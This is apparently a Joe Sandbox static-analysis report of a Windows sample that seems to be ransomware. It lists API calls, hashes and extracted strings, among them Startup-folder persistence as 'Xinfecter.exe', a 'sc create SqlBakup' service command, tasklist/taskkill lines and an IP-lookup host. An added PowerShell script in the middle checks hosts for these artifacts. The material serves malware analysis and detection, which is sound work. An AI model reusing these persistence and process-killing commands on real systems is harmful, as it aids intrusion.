                                          • Opcode Fuzzy Hash: 3a54b5375d5eaabf12792e5d1e6bcb55743a8e6531740d161d9a3fe07a2697ab
                                          • Instruction Fuzzy Hash: 0A416A71E1011D9BDB25DB64CD98BDEB7B9EB58300F2086D9E409A7290DB38AB84CF51
                                          APIs
                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 009C6821
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FileInternetRead
                                          • String ID: `
                                          • API String ID: 778332206-3189776409
                                          • Opcode ID: cd3535357de546cd569dd1284f2bfde3cd0df0822820c174ea7eabd9bd3a37fd
                                          • Instruction ID: c1b9735dce68078c9d4874e394138eaed8f81cb0f1c0342272f7cd05addc9e3f
                                          • Opcode Fuzzy Hash: cd3535357de546cd569dd1284f2bfde3cd0df0822820c174ea7eabd9bd3a37fd
                                          • Instruction Fuzzy Hash: 7251A2B1E101298BEB28CF24CD84B9DB7B5EF85304F10829DE60997291D735AEC8CF59
                                          APIs
                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A1487A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ContextCryptRelease
                                          • String ID: w#G!
                                          • API String ID: 829835001-519468572
                                          • Opcode ID: 0dea4e6f7d865a1b26d3f7fd567770e992c92ec7a641627877c771ecf6149ef7
                                          • Instruction ID: 5acaac24c06610a1a27ad4b6fd33e4820c066ed36bb282c07a0e884e4f56a375
                                          • Opcode Fuzzy Hash: 0dea4e6f7d865a1b26d3f7fd567770e992c92ec7a641627877c771ecf6149ef7
                                          • Instruction Fuzzy Hash: 2121E571A04260ABD724DF9CDD41F9EB3A8EB88B50F00072BFE16D3390E774A801C691
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Crypt$ContextRandomRelease__onexit
                                          • String ID: w#G!
                                          • API String ID: 2784917694-519468572
                                          • Opcode ID: 0ffa73e7bd30546a8a19518fc3717dc449bb81da75bd7fef11cf147de6d180e1
                                          • Instruction ID: 5d71ebe50f6149dd25d8fd0f533648e976f760e8b4d98506c7f7ad8a1ded9b8b
                                          • Opcode Fuzzy Hash: 0ffa73e7bd30546a8a19518fc3717dc449bb81da75bd7fef11cf147de6d180e1
                                          • Instruction Fuzzy Hash: 28F0A0B5A84648EBC701DFC4ED52F9AB7E8F708B10F00067AEA16977C0DA7665048785

                                          Control-flow Graph
                                          • Function entry: 009DC27C (the graph rendering is not recoverable from the page; the raw node listing is omitted)
                                          • Besides the calls listed under APIs below, the graph nodes reference Sleep and the subroutines 009D3DD0, 009C5D90, 009C4500, 009C3100 and 009D1C90
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 009DC3FF
                                          • SetConsoleTitleW.KERNEL32(asykat), ref: 009DC40A
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,dcdcf,00000000), ref: 009DC523
                                          • CopyFileW.KERNEL32(00000000,00000000,00000000,00A8945D,000000FF), ref: 009DC5E3
                                          • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 009DC65D
                                            • Part of subcall function 009D3DD0: GetCurrentThread.KERNEL32 ref: 009D3E13
                                            • Part of subcall function 009D3DD0: OpenThreadToken.ADVAPI32(00000000), ref: 009D3E1A
                                            • Part of subcall function 009D3DD0: GetLastError.KERNEL32 ref: 009D3E24
                                            • Part of subcall function 009D3DD0: GetCurrentProcess.KERNEL32(0000000A,?), ref: 009D3E3B
                                            • Part of subcall function 009D3DD0: OpenProcessToken.ADVAPI32(00000000), ref: 009D3E42
                                            • Part of subcall function 009D3DD0: DuplicateToken.ADVAPI32(?,00000002,?), ref: 009D3E59
                                            • Part of subcall function 009D3DD0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 009D3E84
                                            • Part of subcall function 009D3DD0: LocalAlloc.KERNEL32(00000040,00000014), ref: 009D3E96
                                            • Part of subcall function 009D3DD0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 009D3EAA
                                            • Part of subcall function 009D3DD0: GetLengthSid.ADVAPI32(?), ref: 009D3EBB
                                            • Part of subcall function 009D3DD0: LocalAlloc.KERNEL32(00000040,00000010), ref: 009D3EC7
                                            • Part of subcall function 009D3DD0: InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 009D3EDC
                                            • Part of subcall function 009D3DD0: AddAccessAllowedAce.ADVAPI32(?,00000002,00000003,?), ref: 009D3EF4
                                            • Part of subcall function 009D3DD0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 009D3F0C
                                            • Part of subcall function 009C5D90: GlobalMemoryStatusEx.KERNEL32(21472377), ref: 009C5DAF
                                            • Part of subcall function 009C4500: NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,?,21472377), ref: 009C4565
                                            • Part of subcall function 009C4500: NetApiBufferFree.NETAPI32(00000000), ref: 009C4606
                                            • Part of subcall function 009C4500: NetApiBufferFree.NETAPI32(00000000), ref: 009C4622
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FileInitializeToken$AllocBufferCopyCurrentDescriptorErrorFreeLocalOpenProcessSecurityThread$AccessAllocateAllowedConsoleDaclDuplicateEnumGlobalLastLengthMemoryModeModuleNameStatusTitleUser
                                          • String ID: /f$" start= auto$" start=auto$","$"cmd.exe","$$$$$.PBF$:\Documents and Settings\$:\Users\$Dflt$Fast$INW15$Manual_Mini_Config$Mini_Config$Mini_Config$Version 5.$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\AppData\SysMain.sys$\Start Menu\Programs\Startup\Xinfecter.exe$user$asykat$asykat$c:\R_cfg.ini$dcdcf$k2ba8v$r1d8la$sc create SqlBakup binPath= "$taskkill /PID $tasklist /v /fo csv | findstr /i "dcdcf"$ver
                                          • API String ID: 2029459818-3490420541
                                          • Opcode ID: 44ecad99646357985f22d3e3eace6ea771a9cd06906b6a19b21efe6cbdc818dc
                                          • Instruction ID: e09f02d1d7eb00cecc730dc82da127db51a8863b4c8a1c131ffd9009519bb38e
                                          • Opcode Fuzzy Hash: 44ecad99646357985f22d3e3eace6ea771a9cd06906b6a19b21efe6cbdc818dc
                                          • Instruction Fuzzy Hash: B522C6749012889EDB25EBA0DD41BEEB7B8AF95304F1441E9E40A67293EF305F85CF52
                                          APIs
                                            • Part of subcall function 009C5920: PathIsNetworkPathA.SHLWAPI(?,00AAAABC,?,?,?,21472377), ref: 009C59A7
                                            • Part of subcall function 009C5920: __alloca_probe_16.LIBCMT ref: 009C59D7
                                            • Part of subcall function 009C5920: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,?,?,?,?,?,21472377), ref: 009C59F1
                                            • Part of subcall function 009C5920: GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,21472377), ref: 009C5A0C
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D1D27
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D1D35
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D1D69
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D1D77
                                            • Part of subcall function 009C38C0: GetComputerNameExW.KERNEL32(00000000,?,?,21472377,?), ref: 009C3941
                                            • Part of subcall function 009C38C0: DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?,?,00000000,?,?,?), ref: 009C39E0
                                            • Part of subcall function 009BAE10: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009BAE81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Path$ByteCharComputerDiskDomainFreeInformationIos_base_dtorMultiNameNetworkPrimaryRoleSpaceWide__alloca_probe_16std::ios_base::_
                                          • String ID: | $ ~$,d5$:\Users\$INW15$INW15$Microsoft$\AppData\S-inf.sys$_And_Netword_Drive_Size:$_Encryption_Mode:$_Fast_Mode$_Slow_Mode$___$user$api.ipify.org$echo %date%-%time%$f$hg3l,$n7t0$o8g9n$p2h6$s4e5y$systeminfo|find /i "original"$systeminfo|find /i "os name"$ver$w#G!
                                          • API String ID: 586396178-1000676990
                                          • Opcode ID: 6b633db0d9b88e883ef140be8c9053878bf9a729fa69902ccb92fbf01b4561c7
                                          • Instruction ID: fed93fe24a9662ef75ab0312eb95990fb82c0a5addc6ca77964f6dd2cde53248
                                          • Opcode Fuzzy Hash: 6b633db0d9b88e883ef140be8c9053878bf9a729fa69902ccb92fbf01b4561c7
                                          • Instruction Fuzzy Hash: 7213DE70D102989FEB25DB24CD85BEEBBB6AF91304F1081D9D0486B292DB755F88CF91
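The two string lists above name the host artifacts this sample leaves behind: the setup routine at 009DC27C carries the Startup-folder copy Xinfecter.exe, the driver-named drop \AppData\SysMain.sys, the config file c:\R_cfg.ini, the `sc create SqlBakup binPath= "..." start= auto` service command and the `tasklist /v /fo csv | findstr /i "dcdcf"` / `taskkill /PID` self-discovery (with the console title "asykat" set via SetConsoleTitleW); the routine at 009D1C90 adds \AppData\S-inf.sys and the api.ipify.org lookup. The PowerShell script below is an added host-triage example, not part of the Joe Sandbox report or of the sample, that checks a Windows host for those artifacts. It assumes the names are written verbatim at runtime (the report shows them only as static strings, with the profile directory built from ":\Users\" or ":\Documents and Settings\" plus a user name); the network indicator api.ipify.org is out of its scope.

```powershell
# Added triage check built from the strings in this report. Not part of the Joe Sandbox
# output or of the sample. Assumption: the sample writes these names verbatim at runtime.
$ErrorActionPreference = 'SilentlyContinue'
$findings = New-Object 'System.Collections.Generic.List[string]'

# Profile roots: the sample builds paths from ":\Users\" and ":\Documents and Settings\"
$profileRoots = @("$env:SystemDrive\Users", "$env:SystemDrive\Documents and Settings") |
    Where-Object { Test-Path -LiteralPath $_ } |
    ForEach-Object { Get-ChildItem -LiteralPath $_ -Directory } |
    Select-Object -ExpandProperty FullName

$fileCandidates = foreach ($root in $profileRoots) {
    # Startup-folder persistence (strings ending in \Start Menu\Programs\Startup\Xinfecter.exe)
    Join-Path $root 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe'
    Join-Path $root 'Start Menu\Programs\Startup\Xinfecter.exe'
    # Driver-named drops under AppData (strings \AppData\SysMain.sys and \AppData\S-inf.sys)
    Join-Path $root 'AppData\SysMain.sys'
    Join-Path $root 'AppData\S-inf.sys'
}
# Config file at the drive root (string c:\R_cfg.ini)
$fileCandidates += "$env:SystemDrive\R_cfg.ini"

foreach ($p in $fileCandidates) {
    if (Test-Path -LiteralPath $p -PathType Leaf) {
        $hash = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
        $sig  = (Get-AuthenticodeSignature -LiteralPath $p).Status
        $findings.Add("FILE     $p  sha256=$hash  signature=$sig")
    }
}

# Service persistence (string: sc create SqlBakup binPath= "..." start= auto)
$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='SqlBakup'"
if ($svc) {
    $findings.Add("SERVICE  SqlBakup  state=$($svc.State)  start=$($svc.StartMode)  path=$($svc.PathName)")
}

# Self-discovery the sample performs: tasklist /v /fo csv | findstr /i "dcdcf", then taskkill /PID;
# it also names its console "asykat" (SetConsoleTitleW). Match both against titles and image names.
Get-Process | Where-Object {
    $_.MainWindowTitle -match 'dcdcf|asykat' -or $_.ProcessName -match 'dcdcf|asykat'
} | ForEach-Object {
    $findings.Add("PROCESS  pid=$($_.Id)  name=$($_.ProcessName)  title='$($_.MainWindowTitle)'")
}

if ($findings.Count -eq 0) { 'No artifacts named in this report were found on this host.' }
else { $findings }
```

Run it elevated so that other users' profiles and all process window titles are readable; on current Windows the "Documents and Settings" junction is access-denied and is skipped silently. A hit on the SqlBakup service is the strongest single indicator here, since the binPath it records points at whatever copy of the sample was registered.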

                                          Control-flow Graph
                                          • Function entry: 00A778DD (the graph rendering is not recoverable from the page; the raw node listing is omitted)
                                          • The graph nodes reference only the calls listed under APIs below (CreateProcessA, GetLastError, WaitForSingleObject, GetExitCodeProcess, CloseHandle and the CRT helpers)
                                          APIs
                                            • Part of subcall function 00A823D6: _free.LIBCMT ref: 00A823F8
                                          • _free.LIBCMT ref: 00A7794E
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000), ref: 00A77A08
                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00A77A18
                                          • __dosmaperr.LIBCMT ref: 00A77A1F
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77A2A
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77A35
                                          • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,?,?,00000000,00000000), ref: 00A77A4F
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00A77A5C
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77A6D
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77A78
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77A8D
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77A98
                                          • _free.LIBCMT ref: 00A77AA3
                                          • _free.LIBCMT ref: 00A77AAF
                                          • _free.LIBCMT ref: 00A77ABB
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00A77AC9
                                          • _free.LIBCMT ref: 00A77943
                                            • Part of subcall function 00A74D66: HeapFree.KERNEL32(00000000,00000000,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?), ref: 00A74D7C
                                            • Part of subcall function 00A74D66: GetLastError.KERNEL32(?,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?,?), ref: 00A74D8E
                                          • _free.LIBCMT ref: 00A77994
                                          • _free.LIBCMT ref: 00A7799F
                                          • _free.LIBCMT ref: 00A779AA
                                          • _free.LIBCMT ref: 00A77AD2
                                          • _free.LIBCMT ref: 00A77ADE
                                          • _free.LIBCMT ref: 00A77AEA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free$CloseHandle$ErrorLastProcess$CodeCreateExitFreeHeapObjectSingleWait__dosmaperr
                                          • String ID:
                                          • API String ID: 4143445633-0
                                          • Opcode ID: a2e143b7e99881504c9c4ff01562362916fb64beff344a002d75c6e939ed3927
                                          • Instruction ID: 7057f72a3dea3f38c9ade45bce7e11b30c82da78c35407740c373e49601bb13c
                                          • Opcode Fuzzy Hash: a2e143b7e99881504c9c4ff01562362916fb64beff344a002d75c6e939ed3927
                                          • Instruction Fuzzy Hash: 1D617E72D04209ABEF21EFE4DD45AEEBB79EF44355F20C126F819A2151DB314B44CB61

                                          Control-flow Graph
                                          • Function entry: 009C3100 (the graph rendering is not recoverable from the page; the raw node listing is omitted)
                                          • The graph nodes reference only the calls listed under APIs below (GetFileAttributesW and a chain of CreateDirectoryW calls)
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,AppData\,00000008,?,?,00AAB000,00000001,?,?,?,?,00000000), ref: 009C33B7
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33CD
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33D8
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33DD
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33E5
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33ED
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33F2
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 009C33FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$AttributesFile
                                          • String ID: :\Users\$AppData\$w#G!
                                          • API String ID: 689033430-4204657435
                                          • Opcode ID: 260a9708911df0c1bfc2607f3ae1d149d4cb8e8ebfdc87392ba37d34b9fa0ed6
                                          • Instruction ID: 4308e86f729a6232f17633249901471caa98e25e961aecbcd1d054087104f64e
                                          • Opcode Fuzzy Hash: 260a9708911df0c1bfc2607f3ae1d149d4cb8e8ebfdc87392ba37d34b9fa0ed6
                                          • Instruction Fuzzy Hash: B5D1B231E10248DBDB14DFA4CD85BAEBB72AF85304F20C64CE509AB2A1DB746B85CF51

                                          Control-flow Graph

                                          control_flow_graph: rendered graph of the function at 009B8CB0 (serialized node and edge data omitted; the Winsock calls it reaches are listed under APIs below)
                                          APIs
                                          • std::locale::_Init.LIBCPMT ref: 009B8D2C
                                            • Part of subcall function 00A289F6: __EH_prolog3.LIBCMT ref: 00A289FD
                                            • Part of subcall function 00A289F6: std::_Lockit::_Lockit.LIBCPMT ref: 00A28A08
                                            • Part of subcall function 00A289F6: std::locale::_Setgloballocale.LIBCPMT ref: 00A28A23
                                            • Part of subcall function 00A289F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00A28A79
                                          • WSAStartup.WS2_32(00000202,?), ref: 009B8FDA
                                          • socket.WS2_32(00000002,00000001,00000006), ref: 009B8FFA
                                          • gethostbyname.WS2_32(?), ref: 009B9012
                                          • htons.WS2_32(00000E02), ref: 009B901F
                                          • connect.WS2_32(?,?,00000010), ref: 009B9054
                                          • send.WS2_32(?,?,?,00000000), ref: 009B90B9
                                          • recv.WS2_32(?,?,00002710,00000000), ref: 009B90E4
                                          • recv.WS2_32(?,?,00002710,00000000), ref: 009B9163
                                          • closesocket.WS2_32(?), ref: 009B916E
                                          • WSACleanup.WS2_32 ref: 009B9174
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Lockitrecvstd::_std::locale::_$CleanupH_prolog3InitLockit::_Lockit::~_SetgloballocaleStartupclosesocketconnectgethostbynamehtonssendsocket
                                          • String ID: Connection: close$ HTTP/1.1Host: $GET /$off$w#G!
                                          • API String ID: 928259667-3212753162
                                          • Opcode ID: 7cfedf7315ca7be982ccffd1daed01c081621300d88982fa5082827ef0711e92
                                          • Instruction ID: 93c86547da3d8ea167e9310e94c05bdda2059d6cc1a391d3e20efbe7e22b03da
                                          • Opcode Fuzzy Hash: 7cfedf7315ca7be982ccffd1daed01c081621300d88982fa5082827ef0711e92
                                          • Instruction Fuzzy Hash: 47F1C230A152599FEB29DF28CE48BDDBBB5EF45314F0081D9E508AB292CB759B84CF50

                                          Control-flow Graph

                                          control_flow_graph: rendered graph of the function at 009DA6A0 (serialized node and edge data omitted; the library calls it reaches are listed under APIs below)
                                          APIs
                                            • Part of subcall function 009B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 009B376D
                                            • Part of subcall function 009B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 009B37B2
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009DBB9D
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009DBC1E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Ios_base_dtorThrowstd::ios_base::_
                                          • String ID: ",$ ::$ ="$", $($:: $=" $X$c:\skips.txt$w#G!
                                          • API String ID: 532691672-1913111030
                                          • Opcode ID: 7764c77761f7d72ded48bf67ed0364e99ef639de70d92f2e75165fe25e7132c3
                                          • Instruction ID: 7538d93f52d372432fa74e427ae2e499df1485c067ede128ce564536b0b9282d
                                          • Opcode Fuzzy Hash: 7764c77761f7d72ded48bf67ed0364e99ef639de70d92f2e75165fe25e7132c3
                                          • Instruction Fuzzy Hash: 2BE2F330A10249CBDB14DF78CD85BDDBBB5BF85308F20868DD444AB392DB759A85CB91

                                          Control-flow Graph

                                          control_flow_graph: rendered graph of the function at 00A64832 (serialized node and edge data omitted; the process and handle calls it reaches are listed under APIs below)
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00A6483D
                                          • DuplicateHandle.KERNELBASE(00000000,?,00000000,000000FF,00000000,00000001,00000002), ref: 00A64871
                                          • CloseHandle.KERNEL32(000000FF), ref: 00A64A59
                                            • Part of subcall function 00A6514F: IsProcessorFeaturePresent.KERNEL32(00000017,00A65121,?,?,009B1F07,?,?,00000016,?,?,00A6512E,00000000,00000000,00000000,00000000,00000000), ref: 00A65151
                                            • Part of subcall function 00A6514F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00A65173
                                            • Part of subcall function 00A6514F: TerminateProcess.KERNEL32(00000000), ref: 00A6517A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Process$CurrentHandle$CloseDuplicateFeaturePresentProcessorTerminate
                                          • String ID: /c $D$cmd.exe
                                          • API String ID: 1167604731-1597775715
                                          • Opcode ID: da3cc63f17920118d24c2b820336c42d387366b536cc2b8b3f947eb32bb2bf8c
                                          • Instruction ID: 39b8eb44cd27e464888ebb05dda0ca0cb950b71f95c5e6476582a7bf4eca09ff
